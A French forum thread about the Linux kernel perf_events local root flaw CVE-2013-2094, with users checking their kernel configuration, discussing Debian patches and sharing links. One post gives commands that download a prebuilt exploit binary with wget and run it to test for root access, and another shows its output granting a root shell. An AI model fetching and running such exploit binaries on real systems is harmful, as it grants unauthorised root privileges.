Faille critique dans le noyau Linux

Faille critique b[/b] dans le noyau Linux :033

zdnet.fr/actualites/faille-c … 704673.htm

Article pondu le 17 Août 2009. Tu parles d’une nouveauté…

Dans le cas de la dernière faille médiatisé :

Vous pouvez vois si le module incriminé est embarqué :

grep CONFIG_PERF_EVENTS /boot/config-`uname -r` 

Réponse de ‘yes’ alors il est possible que vous soyez impacté.

Pour tester a ne pas lancer depuis le compte root sous peine d’un kernel panic :whistle: :

[code]# useradd -m -s /bin/bash testexploit

passwd testexploit (renseigner le mot de passe de votre choix)

su - testexploit

$ wget http://mirror.ikoula.com/pub/flaws/cve-2013-2094/test-exploit
$ chmod +x test-exploit
$ ./test-exploit[/code]

Si, après cette étape la commande « id » vous renvoie « uid=0 […] », votre machine est vulnérable.

id

uid=0(root) gid=0(root) groupes=0(root),1019(testexploit)
En rappel le kernel Debian de Squeeze et de Wheezy (donc à fortiori celui de Jessie et SID) ne sont plus impacté par une récente mise à jour.

Si vous n’avez pas encore rebooter il vous faut donc rebooter sur le kernel mise à jour récemment.

Sinon il vous faut en recompiler un d’urgence, la moindre faille dans un CMS peut permettre à un Kevin de prendre la main surla machine via cet exploit.

Un très grand merci à Linus pour avoir dédaigné en parler après un bien trop long silence …

D’après diverses annonces, la version 2.6.32 du noyau de Squeeze n’est pas vulnérable car < 2.6.37. D’ailleurs la récente annonce de sécurité Debian pour le noyau 2.6.32 de Squeeze ne mentionne pas cette faille.

Vous ne parlez pas de la même faille;

Celle du post original concerne les sockets;
L’autre, plus médiatisé récement, est lié à un soucis d’optimisation du compilo

[quote=“haleth”]Vous ne parlez pas de la même faille;

Celle du post original concerne les sockets;
L’autre, plus médiatisé récement, est lié à un soucis d’optimisation du compilo[/quote]

a la base c’etait petite blague mais exacte , voici le lien d’origine pour la nouvelle qui date de deux ans web.nvd.nist.gov/view/vuln/detai … -2013-2094

D’après diverses annonces, la version 2.6.32 du noyau de Squeeze n’est pas vulnérable car < 2.6.37. D’ailleurs la récente annonce de sécurité Debian pour le noyau 2.6.32 de Squeeze ne mentionne pas cette faille.[/quote]

Effectivement toutes mes plates :033 l’apéro était raide.

A consulter :

https://security-tracker.debian.org/tracker/CVE-2013-2094

linuxfr.org/news/root-exploit-su … 38-a-3-8-8

bonjour,
dans le config:
root@alpha30:~# grep CONFIG_PERF_EVENTS /boot/config-uname -r
CONFIG_PERF_EVENTS=y
root@alpha30:~#

je dois recompiler ou j’attends une 3.9.0 avec les risques sur la version antérieure
3.8.5-20130514
je fais les MAJ chaque jour!
Salutations à vous
A+
JB1

Test le hack plutôt;
C’est une faille, le problème n’est pas la présence de l’option, le problème est une mauvaise implémentation de l’option;

C’est surement déjà corrigé;

Amusant la faille:

francois@portos:/tmp$ ./ex 2.6.37-3.x x86_64 sd@fucksheep.org 2010 root@portos:/tmp# mais le code est quelque peu obscur…